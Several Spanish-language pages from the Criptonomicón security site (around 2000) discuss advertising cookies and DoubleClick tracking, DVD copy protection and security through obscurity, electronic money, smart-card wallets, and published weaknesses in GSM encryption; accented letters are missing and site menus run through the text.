Pues bien, siguiendo con el ejemplo, este anuncio ha sido cargado desde un servidor
de Doubleclick Inc. Segn ellos, su labor consiste en centralizar la planificacin,
ejecucin, control, rastreo y presentacin de informes para campaas publicitarias en
lnea de fuerte impacto, combinando para ello las ltimas tecnologas de red y su
experiencia en los medios de comunicacin de masas. En definitiva, buscan crear
soluciones que ayuden a los anunciantes y casas publicitarias a sacar el mximo
partido del potencial de la Web para promocin de marcas, venta de productos y
creacin de relaciones comerciales con clientes.

DoubleClick y dems compaas similares aseguran que no recogen ni almacenan


nombres de usuario, direcciones de correo electrnico o nmeros de telfono; y que
no venden o alquilan la informacin que renen. Segn ellos, la informacin es

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/marketing.html (1 of 2) [25/10/2000 02:32:23 p.m.]

Cookies - Marketing personalizado

utilizada exclusivamente por la compaa para servir publicidad personalizada en


aquellos sitios pertenecientes a la red de DoubleClick. A pesar de todo, tantos
usuarios se han sentido vulnerados en su intimidad, que DoubleClick se vio obligada
a proporcionar un mtodo para deshabilitar su mecanismo de rastreo. Irnicamente,
esta funcin la llave para cerrar la caja de las malvadas cookies de DoubleClick
es ella misma una cookie.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/marketing.html (2 of 2) [25/10/2000 02:32:23 p.m.]

Cookies - Gran amenaza o herramienta?

Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Reverso tenebroso
Riesgos imaginarios

Gran herramienta o amenaza?


Lo que ocurre en un sitio que obtiene sus anuncios de un servidor
de terceras partes cuando nos conectamos a l es que en realidad se
produce una peticin de envo de cookie en la pgina del servidor
del anunciante, no en el que nos conectamos directamente. Dado
que una cookie se puede colocar en cualquier objeto, cuando el
sitio al que accedemos pide el banner al sitio del anunciante, ste
leer o escribir una cookie en nuestro disco duro.

Riesgos reales
Buenas intenciones
Marketing
personalizado
Gran herramienta o
amenaza?
La Gran Cookie nos
vigila
Histeria colectiva

Por lo tanto, la peticin del banner nos cuela primero una cookie y luego nos enva la
imagen publicitaria. En estas circunstancias, la cookie, junto con la peticin de la
imagen, podra posteriormente registrar qu anuncios haban sido presentados
previamente al usuario y qu banners se haban pinchado. Si a continuacin el cliente
navegara hacia otro sitio que obtuviera sus anuncios del mismo servidor anterior,
cuando esa pgina pidiera el banner al servidor de terceras partes, entonces el servidor
leera la misma cookie, lo que le permitira mostrar anuncios a medida, a partir de la
informacin almacenada en la cookie, de manera que el usuario no volvera a ver el
mismo anuncio. Adicionalmente, se establecera otra variable en la cookie indicando
que ya ha visitado ese sitio, de modo que una vez reunida toda esta informacin, se
podra disear fcilmente un perfil de usuario con sus gustos, antipatas y lugares que
visita, con el fin de dirigirle publicidad cada vez ms precisa y personalizada. Resulta
evidente que con el paso del tiempo, estos anuncios se volvern extraordinariamente
personales.
ltimamente, los motores de bsqueda ms populares estn participando en la red
DoubleClick, de manera que tambin nuestras bsquedas quedan registradas. Por
ejemplo, si busco informacin sobre Mozart, Vivaldi y Bach, podran empezar a
aparecerme anuncios sobre CDs de msica clsica.
A pesar de todo, la propaganda de DoubleClick nos asegura que los usuarios ganan
tambin, puesto que ven solamente los mensajes adecuados a su perfil. Habra que ver
si se trata de una ganancia para el usuario... o para el anunciante.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/herramienta.html (1 of 2) [25/10/2000 02:32:24 p.m.]

Cookies - Gran amenaza o herramienta?

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/herramienta.html (2 of 2) [25/10/2000 02:32:24 p.m.]

Cookies - La Gran Cookie nos vigila

Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Reverso tenebroso
Riesgos imaginarios

La Gran Cookie nos vigila

Riesgos reales
Buenas intenciones

Marketing
En cualquier caso, lo ms inquietante es toda esa informacin
personalizado
sobre nuestra actividad en la Red e inclinaciones personales y el
uso que se le podra dar. Cada vez que pinchamos en un anuncio o Gran herramienta o
amenaza?
visitamos una pgina, un registro podra estar actualizndose en
La Gran Cookie nos
alguna parte, anotando cuidadosamente nuestros pasos. El salto
vigila
hacia la violacin de la intimidad consiste simplemente en
Histeria colectiva
imaginar toda esta informacin acerca de los hbitos de navegacin
y consumo de un usuario centralizada en una oficina. Aunque, como se ha explicado,
una cookie no puede ser usada por estas compaas de marketing personalizado para
extraer nuestro nombre, telfono o direccin de correo electrnico, s que podran
conocerlos por otros mecanismos, combinarlo con la informacin que s consiguen de
nosotros sobre nuestros gustos y preferencias, y todo ello almacenarlo y procesarlo
convenientemente en una gran base de datos. Ahora s que para algunos se est
violando nuestra intimidad. Si se aade el hecho de que en general todo ocurre sin
conocimiento del usuario, el anonimato y la intimidad en la Web son un cuento de
viejas. Ms an si se sabe que estos perfiles se pueden vender a terceros.

Un poco de ficcin paranoica: Os imaginis ser rechazados al solicitar un puesto de


trabajo por haber visitado un sitio que aboga por la legalizacin de la marihuana? O
tener que pagar ms por tu seguro despus de visitar un sitio para informacin a
pacientes con SIDA? O encontrarte a la Benemrita en tu puerta despus de bajar de
la Red un manual sobre cmo fabricar bombas?
Extremista? Bueno, la tecnologa est sobre la mesa. Aunque no conocemos de casos
en que haya sucedido algo semejante, s que seala ciertas perspectivas de futuro.
En nuestra opinin, esta tecnologa, a diferencia de lo que voces sensacionalistas, que
vocean ejemplos como los anteriores, han querido hacer creer, no abre las puertas a la
violacin impune de la intimidad, ni taladra agujeros de seguridad en el sistema del
usuario. Se corre mucho mayor peligro cuando pagamos en el restaurante de la
esquina con nuestra tarjeta de crdito que cuando se acepta una cookie de un sitio

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/grancookie.html (1 of 2) [25/10/2000 02:32:24 p.m.]

Cookies - La Gran Cookie nos vigila

respetable.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/grancookie.html (2 of 2) [25/10/2000 02:32:24 p.m.]

Cookies - Histeria colectiva

Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Reverso tenebroso
Riesgos imaginarios

Histeria colectiva

Riesgos reales
Buenas intenciones

Marketing
Cules son las consecuencias de esta histeria colectiva? Si alguien
personalizado
disea un sitio Web cuya funcionalidad descansa principalmente
sobre las cookies, qu pasar si la mayora de la gente desactiva Gran herramienta o
amenaza?
las cookies? Pues ese sitio ya no funcionar como debera. Os
La Gran Cookie nos
acordis de ese mensaje que aparece en la ventana del Explorer
vigila
cuando nos advierte de la inminente llegada de una cookie? Si
Histeria colectiva
hace clic en No, la pgina que intenta ver podra no mostrarse
correctamente. Y as es. Qu opciones nos quedan entonces? Escribir scripts
muchsimo ms complicados, con eventuales agujeros de seguridad? Monopolizar un
ancho de banda todava mayor, enviando gigantescos campos ocultos de formularios
adelante y atrs? Pues no, lo ms probable es que se olvidarn de esta clase de
personalizacin de las pginas, con el resultado final de que la Red perder en calidad
y simplicidad de manejo. En resumen, perdemos todos.

As que para no contribuir a la difusin de esta paranoia acerca de las cookies, lo


mejor que se puede hacer es informar al usuario. En aquellos sitios en que se haga uso
importante de las cookies, debera dejarse bien clara cul es la poltica al respecto,
cmo se usan las cookies, por qu y para qu. Las cookies ayudan a realzar la calidad
de las visitas a un sitio. La informacin almacenada en una cookie permite
proporcionar una experiencia mejor y ms personal la prxima vez que el visitante
vaya a ese sitio. Por qu bamos a perdrnoslo? Explique claramente estas ventajas al
posible visitante. Y muy importante. No castigue al usuario que rechace las cookies.
Algunos navegadores ni siquiera las soportan. Permtales pasearse por su sitio, aunque
su experiencia no est a la altura de la navegacin con cookies.
La preocupacin generalizada con respecto a las cookies nace ms del miedo al uso
que operadores sin escrpulos de ciertos sitios puedan hacer de ellas que de la
tecnologa en s. Otra forma de evitar que se pierda la experiencia mejorada de
navegacin que suponen las cookies pasa por comprobar mediante un sencillo script si
el usuario ha aceptado las cookies y en caso contrario informarle del propsito de las
cookies en ese sitio, con el fin de que si lo desea las acepte en el futuro.
file:///C|/TEMP/criptonomicon/criptonomicon/cookies/histeria.html (1 of 2) [25/10/2000 02:32:24 p.m.]

Cookies - Histeria colectiva

En conclusin, sera deseable que cada sitio que utiliza una cookie advierta a sus
clientes de lo que est haciendo. Al fin y al cabo, no todos tienen ni quieren ofrecer
informacin sobre sus hbitos de navegacin.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/histeria.html (2 of 2) [25/10/2000 02:32:24 p.m.]

Proteccin de derechos de autor y retro-ingeniera

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Proteccin de derechos de autor y retro-ingeniera


La demanda legal de la Digital Versatile Disc Copy Control (DVD-CCA)
contra decenas de personas en todo el mundo que ofrecan en sus pginas
web informacin acerca de cmo reventar el sistema de proteccin de DVD
(v. boletn #61, art. 2), conocido como DVD Content Scrambling System
(CSS) o bien haban puesto enlaces a esa informacin en Internet, ha
reabierto el debate sobre la defensa de los derechos de propiedad
intelectual, as como de las libertades en la Red (vase boletn #64, art. 4).
Hoy en da, debido al uso masivo de los ordenadores y, ms recientemente,
como consecuencia del crecimiento explosivo de Internet, ha proliferado de
forma sin precedentes el consumo, distribucin y comercializacin de
material multimedia digitalizado (imgenes, audio y vdeo), y claro est, la
piratera asociada. Hasta la fecha, no existe ningn procedimiento perfecto
para proteger las versiones electrnicas de documentos de texto, pelculas,
msica o fotografas frente a copias fraudulentas. La explicacin de fondo es
que si un ordenador es capaz de interpretar los datos y presentarlos al
usuario a travs de sus perifricos, entonces dicho ordenador ser tambin
capaz de hacerse con esos datos y almacenarlos para su manipulacin o
reproduccin futuras. En este panorama, donde resulta tan sencillo hacerse
con copias (ilegales o no) de material multimedia y una vez adquirido, resulta
an ms sencillo copiarlo, reproducirlo, manipularlo, etc., la posibilidad de
proteger de alguna forma sus derechos de propiedad intelectual se est
convirtiendo en una verdadera urgencia para los autores de estos trabajos.
A pesar de la dificultad de evitar la copia o explotacin ilcitas, s que existen
algunas tcnicas que permiten complicar la labor a los infractores de leyes
de proteccin intelectual. Aunque estos enfoques pueden ser burlados por
los programadores y usuarios ms inteligentes y tenaces, el esfuerzo que
conllevara violar las protecciones no suele compensar frente al precio de
una copia legal del producto. De esta forma, si bien la tecnologa no protege
frente a un ataque, s puede llegar a hacer que resulte ms cara la piratera
que la adquisicin del producto, actuando as como argumento disuasor

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros17.html (1 of 3) [25/10/2000 02:32:25 p.m.]

Proteccin de derechos de autor y retro-ingeniera


Consejos prcticos

Referencias

Libro de Visitas

frente al abuso de la propiedad intelectual y el pirateo fcil. En la seccin de


Artculos invitados se proporciona un completo documento sobre las marcas
de agua y sus posibilidades, que constituyen la ltima frontera explorada por
la criptografa en materia de proteccin de derechos de autor.
Ahora bien, no debe confundirse la aspiracin legtima de un autor a cobrar
por la difusin de su obra con la retro-ingeniera de un mecanismo de
proteccin pobremente implantado. Como ya se ha repetido hasta la
saciedad desde estas pginas, lo que no puede pretenderse es obtener
seguridad a travs del oscurantismo. Si la industria filmogrfica hubiera
utilizado algoritmos de dominio pblico sobradamente estudiados y
probados, en lugar de empecinarse en el oscurantismo como frmula
taumatrgica para asegurar patticamente sus secretos, no se habra
encontrado con estas sorpresas desagradables. No puede confiarse en que
manteniendo en la sombra los algoritmos criptogrficos se sostendr por
mucho tiempo la seguridad de un sistema. En adelante, para proteger sus
oscuros intereses econmicos y dudosas estrategias comerciales, no le
queda sino recurrir al recurso de la pataleta, interponer injustas demandas
judiciales contra quienes no hicieron sino encontrar caminos para saltar las
ridculas protecciones de sus pelculas o informaron de la existencia de estos
caminos.
No se puede condenar a alguien por denunciar pblicamente la debilidad de
un algoritmo ni dar detalles sobre el mismo. En una sociedad libre, esta
actitud, lejos de censurarse, debera recompensarse por permitir descubrir
fallos en productos de otra forma considerados ingenuamente como
criptogrficamente seguros. Este anuncio debera hacer recapacitar a sus
creadores sobre la conveniencia del oscurantismo. Por desgracia, cuando
las ventas de una gran industria se ven amenazadas, la coaccin y la
amenaza sern las armas utilizadas, contra las que la criptografa tiene poco
que hacer.
Publicado en el Boletn del Criptonomicn #64.

Informacin adicional

OpenDVD.org

The Global Internet Liberty Campaign

Facsmil de la demanda de daos infligidos por apropiacin indebida de


secretos industriales de la DVD-CCA
Criptologa y seguridad

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros17.html (2 of 3) [25/10/2000 02:32:25 p.m.]

Proteccin de derechos de autor y retro-ingeniera

envirselo por correo electrnico. No tienes ms que indicar la direccin del


destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros17.html (3 of 3) [25/10/2000 02:32:25 p.m.]

Las compras en el nuevo milenio

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Las compras en el nuevo milenio


El dinero en monedas y billetes presenta muchas ventajas, como su
aceptacin universal, la rapidez de los pagos, la familiaridad con ellos y el
anonimato que proporciona. Por el contrario, sus mayores inconvenientes
incluyen la voluminosidad cuando se transportan grandes cantidades y,
sobre todo, el riesgo de robo. Durante los ltimos aos, la informatizacin de
los bancos ha permitido que la mayor parte del dinero que circula por el
mundo lo haga en forma de silenciosos bits, ristras de unos y ceros que
viajan a travs de lneas telefnicas o enlaces de satlite en lugar de hacerlo
fsicamente en forma de monedas y billetes.
Con el advenimiento de las tarjetas de plstico con banda magntica, fue
posible que los usuarios accedieran a travs de los cajeros automticos a su
dinero almacenado electrnicamente en el banco. Ms an, los cheques, las
tarjetas de crdito y las de dbito, permiten hoy en da realizar prcticamente
cualquier tipo de pago en casi cualquier comercio y lugar del mundo. A
medida que su uso se extendi y se venci la reluctancia inicial de los
ciudadanos, fueron adoptados como medio de pago comn en Internet y en
situaciones en que las partes no se encontraban fsicamente en contacto. Se
utilizaron protocolos de comunicaciones ya existentes para salir del paso,
como SSL, o se desarrollaron otros con el comercio electrnico en mente,
como SET o CyberCash. Sin embargo, a pesar de su gran versatilidad y
utilidad, el pago mediante tarjeta presenta el problema del elevado coste de
una transaccin, volvindolas por tanto inadecuadas para compras de
escaso valor.
Recientemente, estn apareciendo en este escenario el dinero electrnico y
las tarjetas monedero, con la posibilidad de abaratar los costes por
transaccin, haciendo posible el comercio de mercancas de escaso valor,
tanto a travs de Internet como en comercios en la calle. Nuevas tecnologas
de dinero digital como eCash o MilliCent, permiten mover monedas
electrnicas de un ordenador a otro, mientras que con el uso de tarjetas
monedero o servicios como Virtu@lCash, se transfiere dinero de una cuenta

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros16.html (1 of 3) [25/10/2000 02:32:26 p.m.]

Las compras en el nuevo milenio


Consejos prcticos

Referencias

Libro de Visitas

a otra, incluso por importes muy pequeos.


A medida que las tarjetas monedero se popularicen, ms y ms bienes y
servicios podrn ser pagados con ellas. Con el tiempo, y en la medida en
que se acerquen a las prestaciones del dinero comn en cuanto a facilidad
de uso, rapidez, aceptacin en comercios, anonimato y conveniencia,
monedas y billetes tendern a desaparecer en el futuro, como han
desaparecido ya las conchas y dientes de animales como moneda de
cambio de antao. El dinero digital debe poseer toda una serie de
caractersticas presentes en las tradicionales monedas y billetes para que se
convierta en medio de pago universal desplazando a estos ltimos:
seguridad, fiabilidad, escalabilidad, anonimato, aceptacin, base de clientes,
flexibilidad, eficacia, facilidad de integracin con otras aplicaciones software
y facilidad de uso.
Asumiendo la mxima de que "la economa es el motor del mundo", no es de
extraar que exista una gran variedad de protocolos ya en funcionamiento,
otros en pruebas y an ms en fase de diseo. En estos momentos nos
encontramos en la excitante era del descubrimiento, de desbrozamiento de
tierras vrgenes inexploradas. Cuando se disipen los restos de la explosin
de actividad de investigacin y experimentacin con distintas formas de
dinero electrnico, habrn sobrevivido los sistemas mejor adaptados a las
necesidades del despiadado mundo real. Aunque todava escucharemos por
muchos aos el agradable tintineo de las monedas, ya se est sembrando la
simiente de una Sociedad de la Informacin en la que el dinero electrnico
sea la moneda de cambio.
Publicado en el Boletn del Criptonomicn #63.

Informacin adicional

Monederos electrnicos
CAFE

CEPS

Mondex

Micropago
IBM Micro Payments

MilliCent

NetBill

Monedas electrnicas
eCash

CAFE

NetCash

Cheques electrnicos

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros16.html (2 of 3) [25/10/2000 02:32:26 p.m.]

Las compras en el nuevo milenio

NetCheque

NetChex

PayNow

Tarjeta de crdito
CyberCash

SET

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros16.html (3 of 3) [25/10/2000 02:32:26 p.m.]

Tarjetas Monedero y Comercio Electrnico

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Tarjetas Monedero y Comercio Electrnico


El comercio electrnico al por menor a travs de Internet se encuentra un
paso ms cerca de convertirse en una realidad ubicua y cotidiana. Con la
publicacin a principios del mes de abril de las especificaciones comunes
para monederos electrnicos, realizada por Europay International,
SERMEPA, Visa International y ZKA (Zentraler Kreditausschuss, de
Alemania), la interoperabilidad de las tarjetas monedero ser una realidad
plenamente funcional en la Europa del milenio que viene.
Hasta el da de hoy, coexisten en los distintos estados comunitarios una gran
variedad de tarjetas, todas ellas mutuamente incompatibles entre s, incluso
dentro de un mismo pas, como ocurre sin ir ms lejos en Espaa con las
tarjetas 4B o VisaCash. Esta incompatibilidad impide que el titular pueda
usar la tarjeta emitida en una entidad en comercios o bancos que operen con
otra. En el futuro, tras la adopcin de las especificaciones por la mayora de
las organizaciones de medios de pago en todo el mundo (lo que supondra
ms del 90% de los monederos que circulan hoy por el planeta), el
entendimiento entre las distintas tarjetas har posible que un ciudadano de
la Unin Europea, poseedor de una tarjeta interoperable, pueda recargar en
cualquier pas comunitario su monedero con dinero electrnico en la divisa
apropiada o en Euros, en cualquier punto de carga en bancos o quioscos
construidos al efecto, as como gastarlo en pequeos comercios para
compras de importes tan bajos como se quiera. Su aplicacin al comercio
por Internet ser inmediata.
Uno de los argumentos disuasorios para utilizar Internet para pequeas
compras proviene de la necesidad de pagar los artculos adquiridos
mediante tarjeta de crdito, incluso para compras de unas pocas pesetas.
Esta forma de pago apareja desventajas tanto para el comprador como para
el vendedor al tratarse de transacciones cuyo coste puede superar al importe
del producto o servicio adquirido. Afortunadamente, estos obstculos
quedarn atrs cuando los monederos electrnicos entren en escena a gran
escala a partir del ao 2001, especialmente diseados para pequeas

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros03.html (1 of 3) [25/10/2000 02:32:26 p.m.]

Tarjetas Monedero y Comercio Electrnico


Consejos prcticos

Referencias

Libro de Visitas

compras. Aunque todava no est decidido, para su utilizacin en las


compras a travs de Internet se comercializarn teclados de ordenador
equipados con un lector de tarjeta inteligente.
Todos los estudios sobre comercio electrnico revelan una y otra vez que la
mayor preocupacin de los usuarios a la hora de realizar compras en lnea
est motivada por la desconfianza y el temor a sufrir algn fraude al entregar
su nmero de tarjeta de crdito. Con el fin de paliar estas amenazas, tras un
cuidadoso proceso de diseo y sucesivas revisiones, las especificaciones
prestan especial atencin a la seguridad en la operacin de las tarjetas, de
forma que no se vean comprometidos ninguno de los agentes participantes
en una transaccin electrnica. La seguridad de la tarjeta ha sido auditada
por varios laboratorios de criptografa independientes en todo el mundo,
entre ellos uno espaol, pasando todos los exmenes de seguridad
necesarios para garantizar su uso sin riesgos.
Gracias a esta iniciativa, el comercio electrnico al por menor, ese sueo
an no realizado, ser una realidad ms prxima desde el ao 2001.
Publicado en el Boletn del Criptonomicn #47.

Informacin adicional

Especificaciones CEPS

Monederos electrnicos: de vuelta al mundo de la duda

Comercio electrnico

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros03.html (2 of 3) [25/10/2000 02:32:26 p.m.]

Tarjetas Monedero y Comercio Electrnico


visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros03.html (3 of 3) [25/10/2000 02:32:26 p.m.]

La seguridad de GSM se tambalea

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

La seguridad de GSM se tambalea


Grandes compaas y gobiernos en todo el mundo se empean en
perseguir la seguridad a travs de la oscuridad: consideran que ocultando
los detalles de cmo funcionan sus algoritmos criptogrficos conseguirn
aumentar la seguridad global de sus sistemas. Nada ms lejos de la
realidad. En estas situaciones, lo que inevitablemente ocurre es que el
desarrollo de los algoritmos de proteccin de la confidencialidad se deja en
manos de un equipo de ingenieros y tcnicos que lo llevan a cabo de la
mejor manera que saben y que, sin duda alguna, superan con xito los
ataques convencionales, ofreciendo una seguridad satisfactoria a primera
vista.
Sin embargo, para contar con mayores garantas de que un algoritmo o
protocolo es seguro, no basta con que sea revisado por un equipo de
seguridad a sueldo. Es absolutamente imprescindible que se publique en
revistas cientficas, siendo accesible a todo aquel interesado en estudiar su
robustez. Slo as, sometindose al pblico escrutinio de la comunidad
acadmica, se puede reunir un equipo de investigacin de cientos o miles de
expertos que trabajarn durante meses o aos en la bsqueda de fallos y
vulnerabilidades (considrese el caso de DES, sobre el que se lleva ms de
veinte aos publicando artculos). Ninguna gran empresa ni gobierno puede
permitirse una fuerza humana de semejantes dimensiones. Slo los
algoritmos de dominio pblico que superan durante aos el anlisis e
indagacin de profesionales de la criptografa se pueden considerar
"seguros", en la medida en que no se conoce ningn medio de atacarlos (lo
cual no significa que no existan, sino simplemente que en el estado actual de
evolucin de las matemticas, la informtica y la teora de nmeros no se
conocen vas de ataque eficaces).
Microsoft ha protagonizado recientemente varios ejemplos patticos de
sistemas de seguridad irrisoria desarrollados por la propia empresa, dando la
espalda a algoritmos y protocolos de dominio pblico ampliamente
extendidos y probados. En consecuencia, algunos de sus productos,

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros15.html (1 of 4) [25/10/2000 02:32:27 p.m.]

La seguridad de GSM se tambalea


Consejos prcticos

Referencias

Libro de Visitas

aparentemente seguros porque nadie conoce sus mecanismos internos,


basan su seguridad en unos algoritmos criptogrficos endebles o incluso
triviales de resolver, como ha sido el caso, casi humorstico, de la proteccin
de las contraseas en mquinas con Windows CE, que utilizaban como
algoritmo criptogrfico una suma exclusiva XOR de los caracteres de la
contrasea con la palabra Pegasus (nombre de la primera generacin de
sistemas operativos Windows CE). El caso de las debilidades de PPTP,
protocolo de "tunelado" punto a punto se para asegurar las conexiones sobre
enlaces TCP/IP, reseadas por el famoso criptgrafo Bruce Schneier, ilustra
nuevamente que el secretismo slo sirve para retrasar lo inevitable: el
ataque con xito a un sistema que no ha sido pblicamente estudiado, sino
obcecadamente mantenido en secreto.
Por su parte, el estndar de telefona mvil digital GSM tradicionalmente ha
basado su seguridad en la frmula oscurantista: ocultar los algoritmos y
difundir mentiras para crear en los usuarios la sensacin de privacidad y
confidencialidad. Durante aos se han mantenido en secreto sus algoritmos:
A3, para autenticacin de usuarios ante la red; A8, para derivacin de claves
de sesin; y A5, para cifrar el contenido de la conversacin extremo a
extremo. Estos nombres no son ms que etiquetas para denominar a los
algoritmos, cuya eleccin e implantacin detallada queda al libre albedro de
cada operador en el caso de los dos primeros. Sin embargo, al suministrarse
en el estndar un algoritmo de referencia, el COMP128, y recomendarse la
adopcin del mismo algoritmo para facilitar operaciones como el "roaming",
resulta dudoso que existan muchas redes GSM que hayan desarrollado los
suyos propios.
A lo largo de los ltimos aos han ido saliendo a la luz una serie de datos,
negados sistemticamente por las operadoras y organismos encargados del
desarrollo de GSM, que han puesto de manifiesto el engao y manipulacin
a que se encontraban sometidos los clientes.
Uno de los ms controvertidos fue la constatacin de que en las claves del
algoritmo A5, utilizado para cifrar las conversaciones y preservar as su
confidencialidad, tericamente de 64 bits de longitud, en realidad slo se
utilizan 54, reduciendo por tanto 1024 veces el tiempo necesario para
realizar un ataque de fuerza bruta sobre l. Este debilitamiento deliberado se
conjetura pueda deberse al afn orwelliano de los gobiernos por espiar a sus
ciudadanos, tarea drsticamente facilitada por esta reduccin aparentemente
intencionada en la seguridad de GSM.
Ms an, sin necesidad de limitar el espacio de claves, poco a poco se fue
filtrando informacin acerca de los algoritmos concretos utilizados en A3 y
A8, que resultaron ser variantes de COMP128, que posee importantes
debilidades y fallos de diseo, como revelaron los estudios posteriores
realizados por un grupo de criptgrafos.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros15.html (2 of 4) [25/10/2000 02:32:27 p.m.]

La seguridad de GSM se tambalea

La publicacin en mayo de 1998 de un artculo acerca de la posibilidad de


clonar tarjetas SIM (que identifican al usuario ante la red, hecho fundamental
para saber a quin cobrar la factura de la llamada), destap de nuevo la
polmica en torno a la seguridad real o fingida de GSM. Merece la pena
consultar a este respecto el monumental trabajo de reconstruccin llevado a
cabo por Jess Cea Avin, en el que se describe el ataque y sus
consecuencias.
Recientemente, la noticia hace unos das de que dos investigadores
israeles, Alex Byriukov y Adi Shamir (uno de los ms reputados criptgrafos
del mundo, creador junto a Rivest y Adleman de RSA, de ah el nombre del
algoritmo), han descubierto nuevos fallos en la seguridad de GSM que les
permiten descifrar las conversaciones cifradas con A5/1 en menos de un
segundo! reabre el debate acerca de la verdadera fortaleza de GSM frente a
escuchas ilegales y uso fraudulento de sus tarjetas SIM. Organizaciones
como la GSM Association perseveran en la negacin de los hechos y en
recalcar la seguridad sin parangn de GSM, ciegos a los esfuerzos
criptoanalistas de investigadores de todo el mundo, que lenta pero
sistemticamente van obteniendo su fruto.
De momento, la dificultad de reproducir estos ataques, que exigen costosos
recursos computacionales y equipos de telecomunicaciones muy
sofisticados, como los escneres digitales, de precio muy elevado, cuando
no ilegales en muchos pases, est frenando la comisin generalizada de
delitos de escuchas y llamadas fraudulentas a cargo de otros abonados de la
red. Sin embargo, mientras la industria GSM se empecine en el secretismo y
en negar los riesgos reales que investigadores de todo el mundo descubren
regularmente, llegar el da en que con modestos recursos se podr
escuchar cualquier conversacin o timar a las operadoras y otros usuarios.
Entonces los costes para reparar el boquete sern formidables, por no
haberse querido tapar a tiempo los pequeos agujeros. No habr que
esperar mucho antes de que se demuestre que el oscurantismo es la mejor
frmula... para el fracaso ms estrepitoso!
Publicado en el Boletn del Criptonomicn #62.

Informacin adicional

Smartcard Developer Association

Cifrado GSM. Desarrollo cerrado o desarrollo intencionado?

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
